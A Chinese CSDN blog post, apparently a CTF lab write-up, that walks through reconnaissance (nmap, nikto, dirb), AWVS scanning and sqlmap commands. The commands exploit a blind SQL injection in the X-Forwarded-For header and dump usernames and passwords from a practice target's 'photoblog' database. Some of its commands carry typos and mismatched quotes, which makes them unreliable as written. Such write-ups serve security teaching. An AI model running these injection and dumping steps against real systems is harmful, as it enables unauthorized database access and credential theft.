CTF实验:X-Forwarded-For头注入

最新推荐文章于 2024-05-10 00:22:14 发布
最新推荐文章于 2024-05-10 00:22:14 发布
阅读量1.5k 收藏 6
点赞数 1
分类专栏: CTF 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/floyd_art/article/details/105257028
版权

SQL注入漏洞介绍

SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中;

信息探测

扫描主机服务信息以及服务版本
– nmap -sV 靶场IP地址
快速扫描主机全部信息
– nmap -T4 –A -v 靶场IP地址
探测敏感信息
– nikto -host http://靶场IP地址:端口
dirb http://ip:端口
在这里插入图片描述
发现敏感页面打开,需要用户名和密码
在这里插入图片描述

漏洞扫描

漏洞扫描器 AVWS
功能强大,专注于web安全的漏洞扫描器
在这里插入图片描述
发现高危漏洞,利用它
在这里插入图片描述
查看详细信息,是SQL盲注,X-Forwarded-For头注入
在这里插入图片描述

漏洞利用

利用sqlmap
对扫描的结果进行分析。注意:如果具有SQL注入漏洞,可以直接利用。毕竟SQL注入是高危漏洞,可以直接获取服务器权限。

使用sqlmap利用SQL注入漏洞

– sqlmap -u url –headers=“X-Forwarded-For:” –dbs 查看数据库名 --batch
– sqlmap -u url –headers=“X-Forwarded-For:”–D “数据库名” –tables 查看对应数据库中的数据表 --batch
– sqlmap -u url –headers=“X-Forwarded-For:”–D “数据库名” –T “表名” –columns 查看对应字段 --batch
– sqlmap -u url –headers=“X-Forwarded-For:” –D “数据库名” –T “表名”-C “列名” –dump --batch

sqlmap -u “http://ip” --headers=“X-Forwarded-For:*” --dbs --batch![在这里插入图片描述](https://img-blog.csdnimg.cn/2020040122165548.JPG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2Zsb3lkX2FydA==,size_16,color_FFFFFF,在这里插入图片描述
在这里插入图片描述

sqlmap -u “http://ip” --headers=“X-Forwarded-For:*” -D phototblog --tables --batch

sqlmap -u “http://ip” --headers=“X-forwarede-For:" -D photoblog -T users --columns --batch
在这里插入图片描述
在这里插入图片描述
sqlmap -u “http://ip” --headers="X-Forwarede-For=:” -D photoblog -T users -C password,login --dump --batch
在这里插入图片描述
获得了用户名和密码

总结

只要是用户可以输入的位置都是有可能存在注入点的

floyd_art
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF练习:SQL注入之X-Forwarded-For报
qq_43233085的博客
11-28 971
CTF练习:SQL注入之get参数注入环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本(copy)拿到靶机shell(copy) 靶机地址: 链接: https://pan.baidu.com/s/1u-br8L4Lk4X7EGS7kROhMQ 提取码: 2fmj 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172....
X-Forwarded-For 在 CTF 中的使用
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-07 1004
ip 末尾的 .0.1 要改成变量,当然了,不一定是 10.1.0.1,其他地址也可以,目的是改变 ip 地址实现无限投票。猜测是用户密码,由于是管理员,我们猜测用户为 admin,登录后提示用本地管理员登录。网页提示从本地访问,那就要用到 XFF 了,打开 burp,打开代理,访问网站抓包。下面就举个刷赞的例子。
ctf训练 web安全SQL注入(X-Forwarded-For)
qq_43799246的博客
12-02 557
ctf训练 web安全SQL注入(X-Forwarded-For) SQL注入漏洞介绍 SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行sQ语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中; 实验环境 一台kail攻击机 和 靶机 靶机镜像:https://pan.baidu.com/s/1juB-vkfP9C7RHEM5T4ffAA 提取码:dquy 安
CTF Web】XCTF GFSJ0481 xff_referer Writeup(HTTP协议+XFF伪造+Referer伪造)
最新发布
HEX9CF的技术博客
05-10 1104
X老师告诉小宁其实xff和referer是可以伪造的。
X-Forwarded-For注入漏洞实战
Language_Sumuzhe的博客
05-23 7610
题目:X-Forwarded-For注入漏洞实战 知识点: 是HTTP请求中XFF的伪造和应用,是一道借用XFF来爆破数据库、表、列以及列值的题目。先输入账户为admin,密码为123456进行登录尝试,出现了弹窗,仔细观察弹窗会发现类似IP地址格式的112.111.12.126数据存在,猜测这是服务端记录并显示了客户端的IP地址。 首先了解服务端如何获取客户端请求IP地址? 服务端获取客户端请求IP地址,常见的包括:x-forwarded-for、client-ip等请求,以及remote_add
X-Forwarded-For绕过服务器IP地址过滤
公众号shadow sock7
06-03 1万+
参考: http://www.jianshu.com/p/98c08956183d https://github.com/bl4de/ctf/blob/master/2017/nullcon_HackIM_2017/Web1.md看到一个CTF题中有一个与X-Forwarded-For有关的。 通过在HTTP中设置X-Forwarded-For: 127.0.0.1在正常的TCP 通信中,是
x-forwarded-for手工注入(超详细)
1
05-12 1093
使用靶场来进行演示。 访问靶场后看到的是一个常见的后台的登录框,第一步肯定是先试一下看看有没有弱口令咯,试了几个发现并不存在弱口令,但是发现网站有一串乱码的弹窗如下 虽然是乱码,但是看到里面有ip,发短见识多得我就想到了这大概率是记录下了我本机的ip(这里的ip是开了隧道的不是我的哦~)让我们来抓包看一下 这里可以看到转编码之后确实是记录了我的ip,但是在请求包中没有发现xff,就很奇怪,自己加上。 发现xff的内容是可以随便控制的,下面可以看到输入单引号是报错的,那就直接尝...
java红酒网站源码-ctf-katana:ctf-武士刀
06-05
java网站源码CTF-武士刀 约翰哈蒙德 | 2018 年 2 月 1 日 在撰写本文时,此存储库将仅托管可能有助于解决 CTF 挑战的工具和命令列表。 我希望将其保留为“实时文档”,理想情况下它不会像我制作的旧“工具”页面 () ...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
canhackme:CanHackMe-危险CTF平台
02-04
CanHackMe是危险的CTF平台。 该平台已在Ubuntu 16.04 + Apache 2.4 + PHP 7.3上进行了测试。 如何安装? 安装Apache 2.4 。 .htaccess文件不适用于其他软件。 安装PHP 7.3 。 不支持较低版本。 安装php-sqlite3...
ctf-br.github.io:CTF-BR
07-06
CTF-BR博客:一个深入理解网络安全的资源平台】 CTF-BR 是一个专注于网络安全领域的博客,其源代码托管在GitHub上,网址为ctf-br.github.io。这个平台主要面向那些对Capture The Flag(CTF)比赛感兴趣,或者希望...
SQL注入:X-Forwarded-For注入
zh的博客
10-11 488
靶场地址:http://www.whalwl.host:8010/ 解题准备:本题需要使用burpsuite抓包 解题思路: 1、根据提示,直接抓包,添加X-Forwarded-For参数 a' 2、根据报错,确定闭合符为 ' 构造:a' order by 6# 5正常,6错误,确定字段数为5 3、构造联合查询,发现有2,3回显 4、获得user和database 5、后续注入通过联合查询可以很快获取flag ...
CTF-sql注入(X-Forwarded-For)【简单易懂】
墨鱼菜鸡
09-10 191
目录 环境配置 信息探测 AWVS漏洞扫描 漏洞利用 扫描数据库 扫描表名 扫描字段值 扫描用户名和密码 环境配置 kali 192.168.20.128 靶机 192.168.20.132 链接:https://pan.baidu.com/s/1vUYqkBnWkrfXvdC99nOsSQ 提取码:4p7w 信息探测 ...
BUUCTF刷题记录(4)
bmth666的博客
04-12 1334
文章目录web[ACTF2020 新生赛]Upload web [ACTF2020 新生赛]Upload 和之前极客大挑战一样的题,上传后缀为phtml即可 连上蚁剑,即可得到flag
bugku ctf 管理员系统 (伪造x-forwarded-for绕过服务器IP)
qq_42777804的博客
05-18 4502
随便输入 发现 ip禁止访问 与本地管理员联系登陆 我们查看源码 到最后发现 <!-- dGVzdDEyMw== --> 在线base64解密得到 test123 Username: admin Password:test123 发现居然还是不能提交 那么burp抓包 发给 repeater 发现了可以通...
伪造 X-Forwarded-For
热门推荐
intel80586
05-09 3万+
背景 应同学的要求,帮忙刷票。我上去看了一下,对方网站做了IP限制,一天之内一个IP只能投一票,并没有使用cookie校验,验证码校验等技术,总体来说这个网站的情况是比较常见的,常见的解决办法有两个: 使用大量的真实IP刷票 如果你使用的是一个拨号上网的网络,每次的拨号都能随机分配IP,这种情况下,可以使用投票一次,拨号一次的方法来实现刷票,但这个方案有两个问题: 1. 编程稍微复杂,
CTF-SQL注入-X-Forwarded-For报文
whatiwhere的博客
12-02 1317
nmap -sV xxxxx nmap -T4 -A -v xxxx nikto -host http://192.168.173.134/ 发现了后台登陆地址,但弱口令无法登陆 使用awvs扫描 安全漏洞 高危漏洞 盲注 使用sqlmap进行 注入 sqlmap -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” -...
关于X-Forwarded-For的时间盲注
微笑的孤狼
04-03 495
还是先挂一个我参考的博客 https://www.jianshu.com/p/5d34b3722128 本次是利用到实验CTF题——who are you? 链接在此 http://ctf5.shiyanbar.com/web/wonderkun/index.php 首先从做题目的角度来看,我对于CTF题目做的还是太少,根本没啥思路,按照惯常操作就是看看源代码,抓个包看看 发现能让...
SQLi-LABS Page-1(Basic Challenges)
07-24
SQLi-LABS Page-1(Basic Challenges) 1-22关 附带多种方法

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值